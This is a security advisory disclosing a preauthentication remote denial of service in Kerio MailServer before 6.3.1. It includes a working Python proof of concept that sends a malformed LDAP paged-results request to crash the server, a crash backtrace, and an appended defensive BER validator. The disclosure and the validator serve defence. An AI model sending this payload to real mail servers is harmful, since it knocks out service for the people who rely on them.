SECURITYVULNS:DOC:15407
Dec 15, 2006

Kerio MailServer < 6.3.1 remote Denial of Service

vulners.com

Hi,

The Kerio MailServer 6.3.1 changelog mentions the following bug fix:
'Fixed possible service stop when handling certain LDAP query'

It turns out that the vd_kms6 vulnerability (part of VulnDisco since Oct
2006) has been fixed.

Below is simple proof-of-concept code for this bug:

#!/usr/bin/env python
#
# kms1.py - Kerio MailServer 6.2.2 preauth remote DoS
#
# fixed in Kerio MailServer 6.3.1
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

"""
gdb backtrace:

gdb -q ./mailserver core.18450

(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from shared object read from target memory...(no debugging
symbols found)...done.
Loaded system supplied DSO at 0xb76000
Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'.
Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x0821c444 in LDAPSearchRequest::parsePagedResults ()
(gdb) bt
#0  0x0821c444 in LDAPSearchRequest::parsePagedResults ()
#1  0x0821c387 in LDAPSearchRequest::setAll ()
#2  0x08093d8a in Ber::getSearchRequest ()
#3  0x08205e48 in LDAPServer::search ()
#4  0x08207de0 in LDAPServer::server ()
#5  0x08207e2e in ldap_handler ()
#6  0x0841be13 in KServerTask::handler ()
#7  0x082033c6 in KThreadPool::workerThread ()
#8  0x086ee7b6 in kerio::tiny::thread ()
#9  0x00772b80 in start_thread () from /lib/libpthread.so.0
#10 0x00558dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>:    mov    (%eax),%edx
(gdb) i r eax
eax            0x449    1097
"""

import socket

host = "localhost"
port = 389

# One LDAP SearchRequest for (objectClass=*) carrying a malformed paged-results
# control (OID 1.2.840.113556.1.4.473); per the backtrace above, the server
# faults in LDAPSearchRequest::parsePagedResults() while handling it.
# Bytes literals keep the payload identical under Python 2 and Python 3.
s = b"\x30\x82\x04\x4d\x02\x01\x26\x63\x82\x04\x46\x04\x00\x0a\x01\x02"
s += b"\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62"
s += b"\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00\xa0\x82\x04"
s += b"\x20\x30\x82\x04\x1c"
s += b"\x01" * 1024
s += b"\x16\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x31"
s += b"\x33\x35\x35\x36\x2e\x31\x2e\x34\x2e\x34\x37\x33\x01\x01\x00\x04"
s += b"\x00"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
sock.sendall(s)
sock.recv(10000)
sock.close()

Regards,
-Evgeny
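The defensive counterpart to the crash above, added here as an example (not part of the advisory, and not Kerio's code): a bounds-checked BER walker that refuses any LDAP element whose length escapes its container, requires a SearchRequest to carry exactly its eight RFC 4511 fields, and checks that a paged-results control (the RFC 2696 control that parsePagedResults() in the backtrace handles) has a SEQUENCE {INTEGER, OCTET STRING} value. The three sample messages are constructed in the block, not taken from the page.

```python
# Added example, not code from the advisory: a bounds-checked BER walker that validates an LDAPMessage
# (RFC 4511) and its paged-results control (RFC 2696, the control that parsePagedResults() handles).
PAGED_RESULTS_OID = b"1.2.840.113556.1.4.473"

def read_tlv(buf, pos, end):              # -> (tag, value_start, value_end); the value never reaches past end
    if pos + 2 > end:
        raise ValueError("truncated TLV header at %d" % pos)
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                     # long-form length carried in 1..4 following bytes
        n = length & 0x7F
        if not 0 < n <= 4 or pos + n > end:
            raise ValueError("bad long-form length at %d" % pos)
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > end:                # the length is attacker-controlled: bound it before anything reads it
        raise ValueError("element overruns its container at %d" % pos)
    return tag, pos, pos + length
def children(buf, pos, end):              # split buf[pos:end] into (tag, value_start, value_end) triples
    out = []
    while pos < end:
        out.append(read_tlv(buf, pos, end))
        pos = out[-1][2]
    return out
def problem(msg):                         # None if msg is well-formed, else a string naming the first defect
    try:
        tag, ms, me = read_tlv(msg, 0, len(msg))
        parts = children(msg, ms, me)     # messageID, protocolOp, optional [0] controls
        if tag != 0x30 or me != len(msg) or len(parts) < 2:
            raise ValueError("not a single LDAPMessage with messageID and protocolOp")
        if parts[1][0] == 0x63 and len(children(msg, parts[1][1], parts[1][2])) != 8:
            raise ValueError("SearchRequest must carry exactly eight fields")
        for _, cs, ce in [c for _, s, e in parts[2:] for c in children(msg, s, e)]:
            fields = children(msg, cs, ce)                    # controlType, [criticality], [controlValue]
            if fields and msg[fields[0][1]:fields[0][2]] == PAGED_RESULTS_OID:
                values = [f for f in fields[1:] if f[0] == 0x04] or [(0x04, ce, ce)]   # absent value == empty
                vtag, vs, ve = read_tlv(msg, values[0][1], values[0][2])              # empty value fails here
                if vtag != 0x30 or [c[0] for c in children(msg, vs, ve)] != [0x02, 0x04]:
                    raise ValueError("paged-results value is not SEQUENCE {INTEGER, OCTET STRING}")
    except ValueError as e:
        return str(e)
def tlv(tag, body):                       # BER TLV with short-form length; every sample here is under 128 bytes
    return bytes([tag, len(body)]) + body
def search_request(control_value):        # constructed (objectClass=*) search carrying one paged-results control
    op = tlv(0x63, tlv(0x04, b"") + tlv(0x0A, b"\x02") + tlv(0x0A, b"\x00") + tlv(0x02, b"\x00") * 2
             + tlv(0x01, b"\x00") + tlv(0x87, b"objectClass") + tlv(0x30, b""))
    ctrl = tlv(0x30, tlv(0x04, PAGED_RESULTS_OID) + tlv(0x01, b"\x00") + tlv(0x04, control_value))
    return tlv(0x30, tlv(0x02, b"\x26") + op + tlv(0xA0, ctrl))

GOOD = search_request(tlv(0x30, tlv(0x02, b"\x64") + tlv(0x04, b"")))   # pageSize 100, empty cookie
EMPTY_VALUE = search_request(b"")                                          # zero-length controlValue
OVERRUN = GOOD.replace(b"\xa0\x26\x30\x24", b"\xa0\x26\x30\x7f", 1)       # control SEQUENCE claims 127 bytes
```

Fed the bytes the proof of concept sends, problem() stops at the field-count check, because those lengths nest the controls inside the SearchRequest rather than beside it as a sibling of the protocolOp.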